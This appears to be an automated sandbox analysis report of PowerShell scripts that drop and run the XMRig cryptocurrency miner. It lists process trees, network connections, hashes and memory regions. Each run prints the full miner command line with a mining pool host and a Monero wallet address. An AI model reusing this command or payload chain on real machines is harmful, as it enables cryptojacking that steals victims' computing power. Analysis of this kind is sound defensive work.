"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhr3ujhh.wzp.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:59

Platform

win10-20240404-en

Max time kernel

1789s

Max time network

1780s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgx5w400.xtt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 03:40

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1780s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
SE 184.31.15.184:443 www.bing.com tcp
US 8.8.8.8:53 184.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_acw32ysg.04q.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:49

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp

Files

memory/3240-0-0x00007FFD82D83000-0x00007FFD82D85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dsotwyiv.qnh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3240-6-0x0000014D2F5D0000-0x0000014D2F5F2000-memory.dmp

memory/3240-11-0x00007FFD82D80000-0x00007FFD83841000-memory.dmp

memory/3240-12-0x00007FFD82D80000-0x00007FFD83841000-memory.dmp

memory/3240-14-0x00007FFD82D80000-0x00007FFD83841000-memory.dmp

memory/3240-15-0x0000014D300A0000-0x0000014D300B2000-memory.dmp

memory/3240-16-0x0000014D30080000-0x0000014D3008A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3252-47-0x0000024A0AF50000-0x0000024A0AF70000-memory.dmp

memory/3252-48-0x0000024A0C840000-0x0000024A0C860000-memory.dmp

memory/3252-49-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-51-0x0000024A0C880000-0x0000024A0C8A0000-memory.dmp

memory/3252-50-0x0000024A0C860000-0x0000024A0C880000-memory.dmp

memory/3252-52-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3240-53-0x00007FFD82D83000-0x00007FFD82D85000-memory.dmp

memory/3240-54-0x00007FFD82D80000-0x00007FFD83841000-memory.dmp

memory/3252-55-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3240-56-0x00007FFD82D80000-0x00007FFD83841000-memory.dmp

memory/3252-57-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-59-0x0000024A0C880000-0x0000024A0C8A0000-memory.dmp

memory/3252-58-0x0000024A0C860000-0x0000024A0C880000-memory.dmp

memory/3252-60-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-61-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-62-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-63-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-64-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-65-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-66-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-67-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-68-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-69-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-70-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-71-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-72-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-73-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-74-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-75-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-76-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-77-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-78-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-79-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-80-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-81-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-82-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-83-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-84-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-85-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-86-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-87-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-88-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-89-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-90-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-91-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-92-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-93-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-94-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-95-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-96-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-97-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-98-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-99-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-100-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-101-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-102-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-103-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-104-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-105-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-106-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-107-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-108-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-109-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-110-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-111-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-112-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-113-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-114-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-115-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-116-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-117-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

memory/3252-118-0x00007FF75D3A0000-0x00007FF75DFD3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:58

Platform

win10-20240404-en

Max time kernel

1795s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/3384-2-0x00007FFD2D573000-0x00007FFD2D574000-memory.dmp

memory/3384-5-0x000001B470DF0000-0x000001B470E12000-memory.dmp

memory/3384-6-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/3384-9-0x000001B470FA0000-0x000001B471016000-memory.dmp

memory/3384-10-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdo3hg15.2o3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3384-25-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/3384-48-0x000001B471120000-0x000001B471132000-memory.dmp

memory/3384-61-0x000001B470F80000-0x000001B470F8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4176-90-0x000001D88AB40000-0x000001D88AB60000-memory.dmp

memory/3384-91-0x00007FFD2D573000-0x00007FFD2D574000-memory.dmp

memory/3384-92-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/4176-93-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/3384-94-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/3384-96-0x00007FFD2D570000-0x00007FFD2DF5C000-memory.dmp

memory/4176-95-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-97-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-98-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-99-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-100-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-101-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-102-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-103-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-104-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-105-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-106-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-107-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-108-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-109-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-110-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-111-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-112-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-113-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-114-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-115-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-116-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-117-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-118-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-119-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-120-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-121-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-122-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-123-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-124-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-125-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-126-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-127-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-128-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-129-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-130-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-131-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-132-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-133-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-134-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-135-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-136-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

memory/4176-137-0x00007FF7D99B0000-0x00007FF7DA5E3000-memory.dmp

